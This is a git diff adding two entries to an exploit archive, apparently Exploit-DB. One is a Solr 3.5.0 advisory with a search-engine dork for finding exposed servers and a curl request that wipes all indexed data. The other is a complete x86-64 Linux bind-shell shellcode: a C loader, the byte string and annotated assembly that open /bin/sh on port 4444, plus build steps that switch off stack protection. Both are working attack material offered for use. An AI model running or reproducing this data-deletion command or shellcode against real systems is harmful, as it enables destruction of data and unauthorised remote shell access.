diff --git a/files.csv b/files.csv index c4c823ec0..388f10331 100755 --- a/files.csv +++ b/files.csv @@ -35405,6 +35405,7 @@ id,file,description,date,author,platform,type,port 39225,platforms/hardware/dos/39225.txt,"Apple watchOS 2 - Crash PoC",2016-01-12,"Mohammad Reza Espargham",hardware,dos,0 39226,platforms/windows/dos/39226.py,"SNScan 1.05 - Scan Hostname/IP Field Buffer Overflow Crash PoC",2016-01-12,"Daniel Velazquez",windows,dos,0 39227,platforms/hardware/remote/39227.txt,"FingerTec Fingerprint Reader - Remote Access and Remote Enrollment",2016-01-12,"Daniel Lawson",hardware,remote,0 +39149,platforms/lin_x86-64/shellcode/39149.c,"x64 Linux Bind TCP Port Shellcode",2016-01-01,Scorpion_,lin_x86-64,shellcode,0 39150,platforms/php/webapps/39150.txt,"Open Audit SQL Injection Vulnerability",2016-01-02,"Rahul Pratap Singh",php,webapps,0 39151,platforms/lin_x86-64/shellcode/39151..c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0 39152,platforms/linux/shellcode/39152..c,"TCP Bindshell with Password Prompt - 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0 @@ -35659,6 +35660,7 @@ id,file,description,date,author,platform,type,port 39415,platforms/php/webapps/39415.txt,"ATutor 2.2 - Multiple XSS Vulnerabilities",2016-02-04,"Curesec Research Team",php,webapps,80 39416,platforms/php/webapps/39416.txt,"Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities",2016-02-04,"Sachin Wagh",php,webapps,80 39417,platforms/windows/local/39417.py,"FTPShell Client 5.24 - (Create NewFolder) Local Buffer Overflow",2016-02-04,"Arash Khazaei",windows,local,0 +39418,platforms/java/webapps/39418.txt,"Solr 3.5.0 - Arbitrary Data Deletion",2016-02-08,N37,java,webapps,0 39419,platforms/multiple/webapps/39419.txt,"dotDefender Firewall 5.00.12865 / 5.13-13282 - CSRF Vulnerability",2016-02-08,hyp3rlinx,multiple,webapps,0 39420,platforms/php/webapps/39420.txt,"WordPress User Meta Manager Plugin 3.4.6 - Information Disclosure",2016-02-08,"Panagiotis Vagenas",php,webapps,80 39421,platforms/php/webapps/39421.py,"WordPress WooCommerce Store Toolkit Plugin 1.5.5 - Privilege Escalation",2016-02-08,"Panagiotis Vagenas",php,webapps,80 diff --git a/platforms/java/webapps/39418.txt b/platforms/java/webapps/39418.txt new file mode 100755 index 000000000..5d32a5c43 --- /dev/null +++ b/platforms/java/webapps/39418.txt @@ -0,0 +1,29 @@ +# Exploit Title: All Solr Data Can Be Delete +# Google Dork: intext:[Schema] [Config] [Analysis] [Schema Browser] +[Statistics] [Info] [Distribution] [Ping] [Logging] +# Date: 5/2/2016 +# Exploit Author: N37 [Myanmar] +# Vendor Homepage: http://lucene.apache.org/solr/ +# Software Link: https://archive.apache.org/dist/lucene/solr/3.5.0/ +# Version: 3.5.0 +# Tested on: fedora 23 + + +Solr is open source enterprise search platform built on Apache Lucene. + +It can be delete all data in solr. solr are use nlp, money of data research, data mining, some of mobile backend on vps . + + +POC or Eg. + +This Query is shwo all data in solr : +http://server:8080/solr/lambeth_planning/select/?q=*%3A*&version=2.2&start=0&rows=10&indent=on + +You can delete all data with curl in terminal : +curl -X GET "server:8080/solr/lambeth_locations/update?stream.body=*:*<%2Fquery><%2Fdelete>&commit=true" + +now you can check with first query in browser. All data are deleted. + + +Regards, +N37 [Myanmar] diff --git a/platforms/lin_x86-64/shellcode/39149.c b/platforms/lin_x86-64/shellcode/39149.c new file mode 100755 index 000000000..70a67d3bd --- /dev/null +++ b/platforms/lin_x86-64/shellcode/39149.c @@ -0,0 +1,159 @@ +/*--------------------------------------------------------------------------------------------------------------------- + * /* +* Author: Scorpion +* Copyright: (c) 2016 iQube. (http://iQube.io) +* Release Date: January 1, 2016 +* +* Description: x64 Linux null-free TCP bind port shellcode +* Assembled Size: 103 bytes +* Tested On: Ubuntu 14.04 LTS +* +* Build/Run: gcc -fno-stack-protector -z execstack bindshell.c -o bindshell +* ./bindshell +* nc localhost 4444 +* +*/ + +/* +* NOTE: This C code binds on port 4444 +* The end of this file contains the .nasm source code +* The Port can be Reconfigured According to your needs +* Instructions for changing port number +* Port obtainer change the port value accorddingly +* port.py +* import socket +* port = 444 +* hex(socket.htons(port)) +* python port.py +* Result : 0x5c11 +* Replace the obtained value in the shellcode to change the port number +* For building the from .nasm source use +* nasm -felf64 filename.nasm -o filename.o +* ld filename.o -o filename +* To inspect for nulls +* objdump -M intel -D filename.o + + +global _start + +_start: + + ; sock = socket(AF_INET, SOCK_STREAM, 0) + ; AF_INET = 2 + ; SOCK_STREAM = 1 + ; syscall number 41 + + xor rax, rax ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases + xor rsi, rsi + mul rsi + push byte 0x2 ;pusing argument to the stack + pop rdi ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO + inc esi ; already rsi is 0 so incrementing the rsi register will make it 1 + push byte 0x29 ; pushing the syscall number into the rax by using stack + pop rax + syscall + + ; copying the socket descripter from rax to rdi register so that we can use it further + + xchg rax, rdi + + ; server.sin_family = AF_INET + ; server.sin_port = htons(PORT) + ; server.sin_addr.s_addr = INADDR_ANY + ; bzero(&server.sin_zero, 8) + ; setting up the data sctructure + + push 0x2 ;AF_INET value is 2 so we are pushing 0x2 + mov word [rsp + 2],0x5c11 ;port 4444 htons hex value is 0x5c11 port values can be be obtained by following above instructions + push rsp ; saving the complete argument to rsi register + pop rsi + + + ; bind(sock, (struct sockaddr *)&server, sockaddr_len) + ; syscall number 49 + + push rdx ; Inserting the null to the stack + push byte 0x10 + pop rdx ; value of the rdx register is set to 16 size sockaddr + push byte 0x31 + pop rax ; rax register is set with 49 syscall for bind + syscall + + ;listen the sockets for the incomming connections + ; listen(sock, MAX_CLIENTS) + ; syscall number 50 + + pop rsi + push 0x32 + pop rax ; rax register is set to 50 syscall for listen + syscall + + ; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len) + ;syscall number 43 + + push 0x2b + pop rax ; rax register is set to 43 syscall for accept + syscall + + ; storing the client socket description + mov r9, rax + + ; close parent + push 0x3 + pop rax ; closing the parent socket connection using close parent rax is set to 3 syscall to close parent + syscall + + xchg rdi , r9 + xor rsi , rsi + + ; initilization of dup2 + push 0x3 + pop rsi ; setting argument to 3 + + + +duplicate: + dec esi + mov al, 0x21 ;duplicate syscall applied to error,output and input using loop + syscall + jne duplicate + + +execve: ; Execve format , execve("/bin/sh", 0 , 0) + xor rsi , rsi + mul rsi ; zeroed rax , rdx register + push ax ; terminate string with null + mov rbx , 0x68732f2f6e69622f ; "/bin//sh" in reverse order + push rbx + push rsp + pop rdi ; set RDI + push byte 0x3b ; execve syscall number (59) + pop rax + syscall + + +*/ + +#include +#include + +unsigned char code[] = \ +"\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02" +//Port number this value can be obtained from the above instructions +"\x11\x5c" +"\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x49\x89\xc1\x6a\x03\x58\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05"; + + + +main() +{ + + printf("Shellcode Length: %d\n", (int)strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} + +